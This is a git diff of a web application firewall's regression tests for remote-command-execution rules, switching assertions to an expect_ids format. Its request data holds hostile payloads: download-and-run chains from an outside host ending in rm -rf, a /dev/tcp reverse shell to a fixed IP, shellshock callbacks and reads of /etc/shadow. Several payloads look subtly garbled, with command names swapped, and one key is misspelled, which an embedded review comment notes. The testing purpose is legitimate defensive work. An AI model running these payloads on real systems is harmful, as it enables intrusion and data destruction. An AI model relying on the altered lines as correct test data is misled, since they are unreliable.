arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 10 desc: RCE from test 932230.yaml combined with html entities in the middle stages: 
@@ -195,7 +204,8 @@ tests: data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 11 desc: RCE from test 932230.yaml combined with html entities at the beginning stages: @@ -214,7 +224,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 12 desc: RCE from test 932230.yaml combined with html entities at the end stages: @@ -233,7 +244,8 @@ tests: data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 13 desc: RCE from https://github.com/payloadbox/command-injection-payload-list and html entities stages: 
@@ -252,7 +264,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 14 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -271,7 +284,8 @@ tests: data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 15 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -290,7 +304,8 @@ tests: data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 16 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -309,7 +324,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 17 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: @@ -328,7 +344,8 @@ tests: data: "arg=%26%2359%3B+;top" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 18 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: 
@@ -347,7 +364,8 @@ tests: data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 19 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: @@ -366,7 +384,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 20 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: @@ -385,7 +404,8 @@ tests: data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 21 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: @@ -404,7 +424,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 22 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the end stages: @@ -423,7 +444,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 23 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: 
@@ -442,7 +464,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 24 desc: RCE in arg and html entity is sent in cookie stages: @@ -462,7 +485,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 25 desc: RCE in arg and html entity is sent in cookie stages: @@ -482,7 +506,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 26 desc: "Unix command injection" stages: @@ -498,7 +523,8 @@ tests: data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 27 desc: "Unix command injection" stages: @@ -514,7 +540,8 @@ tests: data: "var=`cut crs312``dig 34test`" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 28 desc: Test RCE with new semantic versions - ;gcc10.1 stages: @@ -533,7 +560,8 @@ tests: data: "arg=;gcc10.1<<<void main(){}" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 29 desc: Test RCE with new semantic versions - ;irb31 stages: @@ -552,7 +580,8 @@ tests: data: "arg=;irb<<<1+2" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 30 desc: System Command Injection bypass with time negative test stages: 
@@ -569,7 +598,8 @@ tests: uri: "/get?foo=time+warner" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 31 desc: System Command Injection test for BB finding 935E1D91 stages: @@ -586,7 +616,8 @@ tests: uri: "/get?foo=time+sh+-c+whoami" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 32 desc: System Command Injection test for BB finding 935E1D91 - time evasion attempt stages: @@ -603,7 +634,8 @@ tests: uri: "/get?foo=ti''me+sh+-c+whoami" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 33 desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case stages: @@ -620,7 +652,8 @@ tests: uri: "/get?foo='TiMe+Sh+-c+whoami" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 34 desc: System Command Injection test for BB finding 9JJOOBTP - sh -c stages: @@ -637,7 +670,8 @@ tests: uri: "/get?'cmd%3Da%3B%20sh%24XX%20-c%20whoami" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 35 desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an: 1'000'000" stages: @@ -656,7 +690,8 @@ tests: text=Schauen%20Sie%20sich%20diese%20Zahl%20an%3A%201%27000%27000 version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 36 desc: "Positive test - BB BBBZARPI - d=/dev&&(sh)0>$d/tcp/51.15.142.164/777" stages: @@ -673,7 +708,8 @@ tests: uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 37 desc: "55O5COJ5" stages: @@ -690,7 +726,8 @@ tests: code=;c89 -wrapper sh,-c,id . version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 38 desc: "55O5COJ5" stages: 
@@ -707,7 +744,8 @@ tests: code=;c89 -wrapper sh,-c,curl\ google.com . version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 39 desc: "9323HNQU" stages: @@ -724,7 +762,8 @@ tests: code=;vi dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 40 desc: "9323HNQU" stages: @@ -741,7 +780,8 @@ tests: code=;vim dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 41 desc: "9323HNQU" stages: @@ -758,7 +798,8 @@ tests: code=;ex dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 42 desc: "9323HNQU" stages: @@ -775,7 +816,8 @@ tests: code=;vi -c:\!pwd version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 43 desc: "9323HNQU" stages: @@ -792,7 +834,8 @@ tests: code=;vim -c:\!pwd version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 44 desc: "9323HNQU" stages: @@ -809,7 +852,8 @@ tests: code=;ex -c:\!pwd version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 45 desc: "ATFHUJVF" stages: @@ -826,7 +870,8 @@ tests: code=;gdb -nx -ex \!whoami -ex quit version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 46 desc: "JW2SU88A" stages: @@ -843,7 +888,8 @@ tests: data: | code=;cat /path/file.gz output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 47 desc: "FP with word environment" stages: @@ -858,7 +904,8 @@ tests: uri: "/get?args=;environment" version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 48 desc: "FP with word performance" stages: 
@@ -873,7 +920,8 @@ tests: uri: "/get?args=;performance" version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 49 desc: "Block execution of env command with arguments" stages: @@ -889,7 +937,8 @@ tests: data: "args=;env --version" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 50 desc: "Block evasion using here string" stages: @@ -906,7 +955,8 @@ tests: data: | code=;`cat<<<sh -c whoami` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 51 desc: "Block evasion using here string with space" stages: @@ -923,7 +973,8 @@ tests: data: | code=;`cat<<< sh -c whoami` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 52 desc: "Block evasion using here string with single quotes" stages: @@ -940,7 +991,8 @@ tests: data: | code=;`cat<<<'sh -c whoami'` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 53 desc: "Block evasion using here string with double quotes" stages: @@ -957,7 +1009,8 @@ tests: data: | code=;`cat<<<"sh -c whoami"` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 54 desc: "Block evasion using here string with command substitution" stages: @@ -974,7 +1027,8 @@ tests: data: | code=;`cat<<<$(sh -c whoami)` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 55 desc: "Block `time` prefix" stages: @@ -991,7 +1045,8 @@ tests: data: | code=time sh -c whoami output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 56 desc: "Block `strace` prefix" stages: @@ -1008,7 +1063,8 @@ tests: data: | code=strace sh -c whoami output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 57 desc: "Block `nohup` prefix" stages: @@ -1025,4 +1081,5 @@ tests: data: | code=nohup sh -c whoami output: - log_contains: id "932230" + log: + expect_ids: [932230] 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml index 31c1af5ac..3330afade 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml @@ -24,4 +24,5 @@ tests: data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" version: HTTP/1.0 output: - log_contains: id "932231" + log: + expect_ids: [932231] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml index 08692c1c1..068a16d9b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml @@ -19,7 +19,8 @@ tests: uri: "/get?arg=%3Bps" version: HTTP/1.0 output: - log_contains: id "932232" + log: + expect_ids: [932232] - test_id: 2 desc: "/?arg=|vi (x" stages: @@ -35,7 +36,8 @@ tests: uri: "/get?arg=%7Cvi%20%28x" version: HTTP/1.0 output: - log_contains: id "932232" + log: + expect_ids: [932232] - test_id: 3 desc: "/?arg=&w (x" stages: @@ -51,7 +53,8 @@ tests: uri: "/get?arg=%26w%20%28x" version: HTTP/1.0 output: - log_contains: id "932232" + log: + expect_ids: [932232] - test_id: 4 desc: "/?arg=&aptitude" stages: @@ -67,7 +70,8 @@ tests: uri: "/get?arg=%26aptitude" version: HTTP/1.0 output: - no_log_contains: id "932232" + log: + no_expect_ids: [932232] - test_id: 5 desc: Remote Command Execution bypass with time stages: @@ -84,7 +88,8 @@ tests: uri: "/get?foo=time+who" version: HTTP/1.1 output: - log_contains: "id \"932232\"" + log: + expect_ids: [932232] - test_id: 6 desc: Remote Command Execution bypass with time negative test stages: 
@@ -101,7 +106,8 @@ tests: uri: "/get?foo=time+warner" version: HTTP/1.1 output: - no_log_contains: "id \"932232\"" + log: + no_expect_ids: [932232] - test_id: 7 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: @@ -118,4 +124,5 @@ tests: uri: "/get?foo=ti''me+who" version: HTTP/1.1 output: - log_contains: "id \"932232\"" + log: + expect_ids: [932232] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml index e48735f53..4ae77be63 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml @@ -20,7 +20,8 @@ tests: code=;find /etc -name passwd -exec cat {} + version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 2 desc: "5Y3V6UZT" stages: @@ -37,7 +38,8 @@ tests: code=cd /;cd etc;column passwd version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 3 desc: "6BIVX1QB" stages: @@ -54,7 +56,8 @@ tests: code=cd /;cd etc;bridge -b passwd version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 4 desc: "7JRJIWP8" stages: @@ -71,7 +74,8 @@ tests: code=cd /;cd etc;fold passwd version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 5 desc: "ANQ9SN3S" stages: @@ -88,7 +92,8 @@ tests: code=;flock -u / whoami version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 6 desc: "AVI5619I" stages: @@ -105,7 +110,8 @@ tests: code=;cd /;cd etc;base32 passwd|base32 -d version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 7 desc: "P6E0KY27" stages: @@ -122,7 +128,8 @@ tests: data: | code=;cpulimit -l 100 -f whoami output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 8 desc: "PDDUY935" stages: 
@@ -139,7 +146,8 @@ tests: data: | cd /;cd etc;comm passwd passwd output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 9 desc: "PDDUY935 - but uppercase" stages: @@ -156,7 +164,8 @@ tests: data: | CD /;CD ETC;COMM PASSWD PASSWD output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 10 desc: "FP with word comment" stages: @@ -171,7 +180,8 @@ tests: uri: "/get?args=comment" version: HTTP/1.0 output: - no_log_contains: id "932235" + log: + no_expect_ids: [932235] - test_id: 11 desc: "FP with word performance" stages: @@ -186,7 +196,8 @@ tests: uri: "/get?args=;performance" version: HTTP/1.0 output: - no_log_contains: id "932235" + log: + no_expect_ids: [932235] - test_id: 12 desc: "Block execution of perf command with arguments" stages: @@ -202,7 +213,8 @@ tests: data: "args=;perf --version" version: HTTP/1.1 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 13 desc: "Block evasion using here string" stages: @@ -219,7 +231,8 @@ tests: data: | code=;`cat<<<ifconfig` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 14 desc: "Block evasion using here string with space" stages: @@ -236,7 +249,8 @@ tests: data: | code=;`cat<<< ifconfig` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 15 desc: "Block evasion using here string with single quotes" stages: @@ -253,7 +267,8 @@ tests: data: | code=;`cat<<<'ifconfig'` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 16 desc: "Block evasion using here string with double quotes" stages: @@ -270,7 +285,8 @@ tests: data: | code=;`cat<<<"ifconfig"` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 17 desc: "Block evasion using here string with command substitution" stages: @@ -287,7 +303,8 @@ tests: data: | code=;`cat<<<$(ifconfig)` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 18 desc: "Block `time` prefix" stages: 
@@ -304,7 +321,8 @@ tests: data: | code=time ifconfig output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 19 desc: "Block `strace` prefix" stages: @@ -321,7 +339,8 @@ tests: data: | code=strace ifconfig output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 20 desc: False positive against "time" stages: @@ -339,7 +358,8 @@ tests: data: "var=hello; time he came" version: HTTP/1.1 output: - no_log_contains: id "932235" + log: + no_expect_ids: [932235] - test_id: 21 desc: False positive against "more" stages: @@ -357,7 +377,8 @@ tests: data: "var=a hero; more than" version: HTTP/1.1 output: - no_log_contains: id "932235" + log: + no_expect_ids: [932235] - test_id: 22 desc: "Block `nohup` prefix" stages: @@ -374,7 +395,8 @@ tests: data: | code=nohup ifconfig output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 23 desc: "Block ad-hoc ansible commands" stages: @@ -391,7 +413,8 @@ tests: data: | code=time; ansible all -m ping output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 24 desc: "Block ansible config dump command" stages: @@ -408,7 +431,8 @@ tests: data: | code=time; ansible-config dump output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 25 desc: "Block installing collections from ansible galaxy" stages: @@ -425,7 +449,8 @@ tests: data: | code=time; ansible-galaxy collection install community.general output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 26 desc: "Block ad-hoc ansible commands using ansible-console" stages: @@ -442,7 +467,8 @@ tests: data: | code=time; ansible-console output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 27 desc: "Block ansible-doc command" stages: @@ -459,7 +485,8 @@ tests: data: | code=time; ansible-doc plugin ping output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 28 desc: "Block dumping ansible inventory file and variables" stages: 
@@ -476,7 +503,8 @@ tests: data: | code=time; ansible-inventory --list output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 29 desc: "Block ansible pull from remote repository" stages: @@ -493,7 +521,8 @@ tests: data: | code=time; ansible-pull --url example.com output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 30 desc: "Block decrypting ansible secrets" stages: @@ -510,7 +539,8 @@ tests: data: | code=time; ansible-vault decrypt secret output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 31 desc: "Block execution of ansible playbooks" stages: @@ -527,7 +557,8 @@ tests: data: | code=time; ansible-playbook site.yml output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 32 desc: "Block decryption of secrets with chef-vault" stages: @@ -544,7 +575,8 @@ tests: data: | code=time; chef-vault -i secret output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 33 desc: "Block execution of chef-shell command" stages: @@ -561,7 +593,8 @@ tests: data: | code=time; chef-shell output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 34 desc: "Block execution chef recipie book" stages: @@ -578,7 +611,8 @@ tests: data: | code=time; chef-run all recipie.rb output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 35 desc: "Block execution chef recipie book against a specific node" stages: @@ -595,7 +629,8 @@ tests: data: | code=time; chef-client -t 1.1.1.1 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 36 desc: "Block execution of visudo" stages: @@ -612,7 +647,8 @@ tests: data: | code=time; visudo output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 37 desc: "Block execution of CrowdSec cscli" stages: 
@@ -629,7 +665,8 @@ tests: data: | code=time; cscli alerts list output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 38 desc: "FP against 'Times & Schedule` for `sched`" stages: @@ -644,4 +681,5 @@ tests: uri: "/get?test=Times%20%26%20Schedule" version: HTTP/1.1 output: - no_log_contains: id "932235" + log: + no_expectIds: [932235] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml index 9a746f9b0..9e8e3fd92 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml @@ -22,7 +22,8 @@ tests: version: HTTP/1.0 data: ;cp /var/log/apache2/error.log evil.php output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 2 desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an: 1'000'000" stages: @@ -41,7 +42,8 @@ tests: text=Schauen%20Sie%20sich%20diese%20Zahl%20an%3A%201%27000%27000 version: HTTP/1.1 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 3 desc: "Positive test - BB BBBZARPI - d=/dev&&(sh)0>$d/tcp/51.15.142.164/777" stages: @@ -58,7 +60,8 @@ tests: uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 4 desc: "55O5COJ5" stages: @@ -75,7 +78,8 @@ tests: code=;c89 -wrapper sh,-c,id . version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 5 desc: "55O5COJ5" stages: @@ -92,7 +96,8 @@ tests: code=;c89 -wrapper sh,-c,curl\ google.com . version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 6 desc: "9323HNQU - should not be detected at PL 2" stages: 
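Review bot: The key `no_expectIds` written in the new `log:` block of test 38 (hunk `@@ -644,4 +681,5 @@` of 932235.yaml) is misspelled; every other hunk in this series uses `no_expect_ids`. If the test runner drops unknown keys, this false-positive check for `Times & Schedule` stops asserting anything and a regression where the rule starts matching `sched` in that input would go unnoticed; if the runner validates keys strictly, the whole file fails to load. Either outcome is worse than the `no_log_contains` check the hunk removes, so the line should read `no_expect_ids: [932235]`. Which of the two behaviours the runner has is not visible from the diff.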
@@ -109,7 +114,8 @@ tests: code=;vi dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 7 desc: "9323HNQU" stages: @@ -126,7 +132,8 @@ tests: code=;vim dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 8 desc: "9323HNQU" stages: @@ -143,7 +150,8 @@ tests: code=;ex dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 9 desc: "9323HNQU - should not be detected at PL 2" stages: @@ -160,7 +168,8 @@ tests: code=;vi -c:\!pwd version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 10 desc: "9323HNQU" stages: @@ -177,7 +186,8 @@ tests: code=;vim -c:\!pwd version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 11 desc: "9323HNQU" stages: @@ -194,7 +204,8 @@ tests: code=;ex -c:\!pwd version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 12 desc: "ATFHUJVF" stages: @@ -211,7 +222,8 @@ tests: code=;gdb -nx -ex \!whoami -ex quit version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 13 desc: "JW2SU88A" stages: @@ -228,7 +240,8 @@ tests: data: | code=;cat /path/file.gz output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 14 desc: "4JOGUXYQ" stages: @@ -245,7 +258,8 @@ tests: data: | find /etc -name passwd -exec cat {} + output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 15 desc: "ANQ9SN3S" stages: @@ -262,7 +276,8 @@ tests: data: | code=flock -u / whoami output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 16 desc: "JW2SU88A" stages: @@ -279,7 +294,8 @@ tests: data: | code=cat /path/file.gz output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 17 desc: "P6E0KY27" stages: 
@@ -296,7 +312,8 @@ tests: data: | code=cpulimit -l 100 -f whoami output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 18 desc: "FP agains 'fi' without word boundary" stages:
@@ -311,7 +328,8 @@ tests: uri: "/get?field_metatags[0][advanced][rights]=somevalue" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 19 desc: "FP MailerUI" stages:
@@ -326,7 +344,8 @@ tests: uri: "/get?args=MailerUI" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 20 desc: "FP tasksListView" stages:
@@ -341,7 +360,8 @@ tests: uri: "/get?args=tasksListView" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 21 desc: System Command Injection (932236) from old modsec regressions stages:
@@ -360,7 +380,8 @@ tests: uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 22 desc: System Command Injection (932236) from old modsec regressions stages:
